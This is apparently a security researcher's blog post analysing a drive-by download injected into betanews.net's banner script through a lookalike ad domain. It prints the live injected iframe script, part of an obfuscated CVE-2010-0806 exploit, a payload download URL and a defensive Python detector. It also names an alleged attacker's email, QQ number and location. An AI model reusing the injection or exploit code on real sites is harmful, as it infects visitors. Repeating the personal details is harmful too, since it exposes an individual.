Malvertising or drive-by web malware attack?

Recently we've been thinking about how to generate some statistics for malvertising.

Sometimes it's tricky, because nowadays more and more drive-by downloads try to hide themselves by disguising their payload as content coming from ad servers.

Here's an example. Recently our scanners reported that betanews.net, a Korean news website ranking 671 in Korea, was serving live drive-by downloads.

Well, it indeed is, as of this writing.

In its index page, www.betanews.net contains the following JavaScript, which displays ad banners:

<script type="text/javascript" src="/js/banner.js"></script>

/js/banner.js was compromised and the following malicious script was inserted at the end of the file:

if(document.cookie.indexOf('xxoo')==-1){var expires=new Date();expires.setTime(expires.getTime()+24*60*60*1000);document.cookie='xxoo=Yes;path=/;expires='+expires.toGMTString;document.write(unescape("%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%61%64%2E%69%6C%69%6B%65%63%31%69%63%6B%2E%63%6F%6D%2F%61%64%2E%61%73%70%22%20%77%69%64%74%68%3D%30%20%68%65%69%67%68%74%3D%30%3E%3C%2F%69%66%72%61%6D%65%3E"));}

Which, after decoding, writes the following:

<iframe src="http://ad.ilikec1ick.com/ad.asp" width=0 height=0></iframe>

This "ilikec1ick.com" domain apparently tries to resemble "ilikeclick.com", which is a Korean ad network.
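The injected snippet above has two properties worth building a check around: the iframe only exists inside a percent-encoded string handed to unescape(), and the whole thing is gated on an "xxoo" cookie that the script itself sets for 24 hours, so a scanner that keeps cookies between visits sees the injection once and then not again for a day. The following is an added example, not code from the original post or from betanews.net: it decodes unescape() literals statically (no script execution, so the cookie gate is irrelevant), reports iframes that are sized to zero or styled invisible, and compares the iframe host against a constructed list of expected ad-network domains to catch one-character lookalikes of the ilikec1ick/ilikeclick kind. The sample input is the quoted banner.js tail; the function names and the KNOWN_AD_DOMAINS list are my own assumptions.

```python
import re
from urllib.parse import urlsplit

# Constructed sample: the injected tail of /js/banner.js as quoted in the post
# (one JavaScript string, split across Python lines here for readability only).
INJECTED_JS = (
    "if(document.cookie.indexOf('xxoo')==-1){var expires=new Date();"
    "expires.setTime(expires.getTime()+24*60*60*1000);"
    "document.cookie='xxoo=Yes;path=/;expires='+expires.toGMTString;"
    'document.write(unescape("%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A'
    "%2F%2F%61%64%2E%69%6C%69%6B%65%63%31%69%63%6B%2E%63%6F%6D%2F%61%64%2E%61%73%70"
    "%22%20%77%69%64%74%68%3D%30%20%68%65%69%67%68%74%3D%30%3E%3C%2F%69%66%72%61%6D"
    '%65%3E"));}'
)

# Assumed list of ad-network domains this site legitimately loads from (constructed).
KNOWN_AD_DOMAINS = ["ilikeclick.com"]

_ESC = re.compile(r"%u([0-9A-Fa-f]{4})|%([0-9A-Fa-f]{2})")
_UNESCAPE_CALL = re.compile(r"""unescape\(\s*(["'])(.*?)\1\s*\)""", re.S)
_IFRAME = re.compile(r"<iframe\b[^>]*>", re.I)
_SRC = re.compile(r"""\bsrc\s*=\s*["']?([^"'\s>]+)""", re.I)
_ZERO_DIM = re.compile(r"""\b(?:width|height)\s*=\s*["']?0+\b""", re.I)
_COOKIE_GATE = re.compile(r"document\.cookie\.indexOf\(")


def js_unescape(s):
    """Mirror JavaScript's legacy unescape(): decode %XX and %uXXXX, leave the rest."""
    return _ESC.sub(lambda m: chr(int(m.group(1) or m.group(2), 16)), s)


def is_hidden(tag):
    """True if the iframe is sized to zero or styled invisible, i.e. not meant to be seen."""
    compact = tag.replace(" ", "").lower()
    return bool(_ZERO_DIM.search(tag)) or "display:none" in compact or "visibility:hidden" in compact


def registrable(host):
    """Crude 'last two labels' approximation of the registrable domain (no public-suffix list)."""
    return ".".join(host.lower().split(".")[-2:])


def edit_distance(a, b):
    """Levenshtein distance, used to spot one-character lookalikes such as l -> 1."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def lookalike_of(host, known):
    """Return the known ad domain this host imitates (distance exactly 1), else None."""
    dom = registrable(host)
    for k in known:
        if dom != k and edit_distance(dom, k) == 1:
            return k
    return None


def find_hidden_iframes(js, known_ad_domains=KNOWN_AD_DOMAINS):
    """Decode every unescape("...") literal in a script and report the iframes it would write."""
    findings = []
    gated = bool(_COOKIE_GATE.search(js))  # payload shown only when a marker cookie is absent
    for m in _UNESCAPE_CALL.finditer(js):
        html = js_unescape(m.group(2))
        for tag in _IFRAME.findall(html):
            src = _SRC.search(tag)
            if not src:
                continue
            host = urlsplit(src.group(1)).hostname or ""
            findings.append({
                "src": src.group(1),
                "host": host,
                "hidden": is_hidden(tag),
                "cookie_gated": gated,
                "lookalike_of": lookalike_of(host, known_ad_domains),
            })
    return findings


if __name__ == "__main__":
    for finding in find_hidden_iframes(INJECTED_JS):
        print(finding)
```

Run against the quoted snippet, the checker reports one iframe, src http://ad.ilikec1ick.com/ad.asp, hidden, cookie-gated, and a one-character lookalike of ilikeclick.com. The decoder is deliberately static; if you instead load the page in an instrumented browser to catch injections like this, start from a fresh cookie jar on every visit, otherwise the 24-hour marker cookie hides the payload on the second run.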

http://ad.ilikec1ick.com/ad.asp contains the JavaScript exploit:

<script>
document.write("<bu"+"tton i"+"d='mon' o"+"ncl"+"ick"+"='sc"+"lick();' S"+"TYLE='DISP"+"LAY"+":NONE'></b"+"utton>");
var eLFGhbswV="%x9090%";var ZyOWqionK="x9090%x5858%x5858%x10EB%x4B5B";var LoLYVDGGQ="%xC933%xB966%x03B8%x3480";var cXbQEhvHS="%xBD0B%xFAE2%x05EB%xEBE8%";var UpiNKTfoo="xFFFF";var GIMIByGgI="%x54FF%xBEA3%xBDBD%xD9E2";var xsBZzgBPo="%x8D1C%";var lXOdHiLAV="xBDBD";var ZzEEOlPoD="%x36BD%xB1FD%xCD36%x1";var SbYhcedXP="0A1%xD53";var xngsAiUQI="6%x36B5%xD74A%xE4A";var KGhCigcMg="C%x0355%xBDBF%x";var iWWZubmWc="2DBD%x455F%x8ED5%x";var pefyOgmGu="BD8F%xD5BD%xCEE8%xCF";var kEqSfhtbi="D8%x36E9%xB1FB%x0";var AObPGCHfF="355%xBDBC%x36BD%xD755%xE4B";var
(omitted)

This is an iepeers (CVE-2010-0806) exploit; after successful exploitation, the browser downloads and executes http://weniz.co.kr/mall/updir/cs/pds.exe.

The exploit, ad.asp, triggers 7/32 on VirusTotal, and the malware, pds.exe, triggers 27/42.

OK, and so, is this a drive-by download attack, or a malvertising attack?

Very similar to the previous "adshufffle.com" malvertising incident, this incident also involves a malicious domain "ilikec1ick.com" which resembles "ilikeclick.com".

So should this be categorized as a malvertising incident? I would say no. I don't think the attacker registered ilikec1ick.com and then tricked betanews.net into running his ad. I think in this case, he simply hacked into betanews.net and modified their banner.js file. However, in order to prolong the lifespan of this drive-by download operation, he registered his malicious domain to resemble an ad network, hoping that this would reduce the chance of someone noticing something funny.

This is one of the challenges we currently face in generating malvertising statistics. Although malvertising, mass SQL injections, mass hosting compromises, mass WordPress injections, and individual hacks such as this case all often end up serving drive-by downloads (Web malware), the threats should be categorized differently from a "point of entry" standpoint. However, doing so requires a fair amount of manual labor.

Wayne

PS: Last time we were able to identify the individual behind the "adshufffle.com" malvertising attack. Well, how about for this example? We gave it a try.

The domain ilikec1ick.com was registered on Jan 19th by "gxiboy@gmail.com". This fellow posted an ad (in Chinese) last month:

接单(拿SHELL 数据库 等等)

接单
地区:韩国 台湾 美国 等等(除国内)
类型:数据库(各种),webshell,渗透项目测试等等
要求:只接3000以上的单子 小单勿扰
找长期合作伙伴 无需定金,拿到后验证过付钱.
联系方式GT Gxiboy@Gmail.com QQ:9 9 8 3 8 0 8

I'll translate it:
Hope to acquire projects (get shell, database, etc)
Region: Korea, Taiwan, US, etc, but no domestic targets (mainland China)
Scope of work: all types of databases, webshell, pentesting
Requirement: Fees start at no less than 450 USD / project

Looking for long-term partnerships, no up-front payment required, pay after you get what you want.

And then there's his email and QQ. According to his QQ profile, he's a 25-year-old male nicknamed "All night prince," based in China. I think he's based in Guangdong, because most of the websites he operates, for example ktdown.com and www.tianqiyugao.net, are located in Guangdong.

The "services" he offers match our speculation that he broke into betanews.net and injected the drive-by iframe.
